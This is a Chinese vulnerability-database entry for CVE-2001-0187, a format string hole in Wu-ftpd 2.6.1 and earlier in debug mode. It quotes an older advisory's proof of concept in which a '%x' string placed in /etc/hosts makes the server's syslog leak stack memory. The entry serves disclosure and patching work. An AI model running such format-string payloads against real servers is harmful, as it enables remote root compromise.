Wu-ftp debug命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106181 漏洞类型 格式化字符串
发布时间 2001-01-23 更新时间 2006-09-20
CVE编号 CVE-2001-0187 CNNVD-ID CNNVD-200103-098
漏洞平台 Unix CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20594
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-098
|漏洞详情
Wu-ftp2.6.1及其之前的版本在启用debug模式运行时存在格式化字符串漏洞。远程攻击者可以借助PASV端口分配记录的畸形参数执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2296/info

Wu-ftpd is a widely used unix ftp server. It contains a format string vulnerability that may be exploitable under certain (perhaps 'extreme') circumstances.

When running in debug mode, Wu-ftpd logs user activity to syslog in an insecure manner. An attacker with control over the server's hostname resolving facility could exploit this vulnerability to get root access remotely on the victim host. 

The following example demonstrates the vulnerability.

Note: /etc/hosts is used as the example name resolving mechanism. Could be DNS, NIS, etc.

Conditions:

$ grep 127.0.0.1 /etc/hosts
127.0.0.1 %x%x%x%x%x%x%x%x%x%x

$ grep ftpd /etc/inetd.conf
ftp stream tcp nowait root /usr/sbin/tcpd /tmp/wuftpd-2.6.0/src/ftpd -v

$ ncftpget -F 127.0.0.1 /tmp /usr/lib/ld.so

$ tail /var/log/syslog.debug

Jan 24 14:17:01 xxx ftpd[30912]: PASV port 47479 assigned to 80862b0806487eb9778084da87bffff16c9640151020bfffe108401c9004 [127.0.0.1]

..<snip extra output>..
|参考资料

来源:BID
名称:2296
链接:http://www.securityfocus.com/bid/2296
来源:DEBIAN
名称:DSA-016
链接:http://www.debian.org/security/2001/dsa-016
来源:XF
名称:wuftp-debug-format-string
链接:http://xforce.iss.net/static/6020.php
来源:ftp.wu-ftpd.org
链接:ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_current/missing_format_strings.patch
来源:CONECTIVA
名称:CLA-2001:443
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000443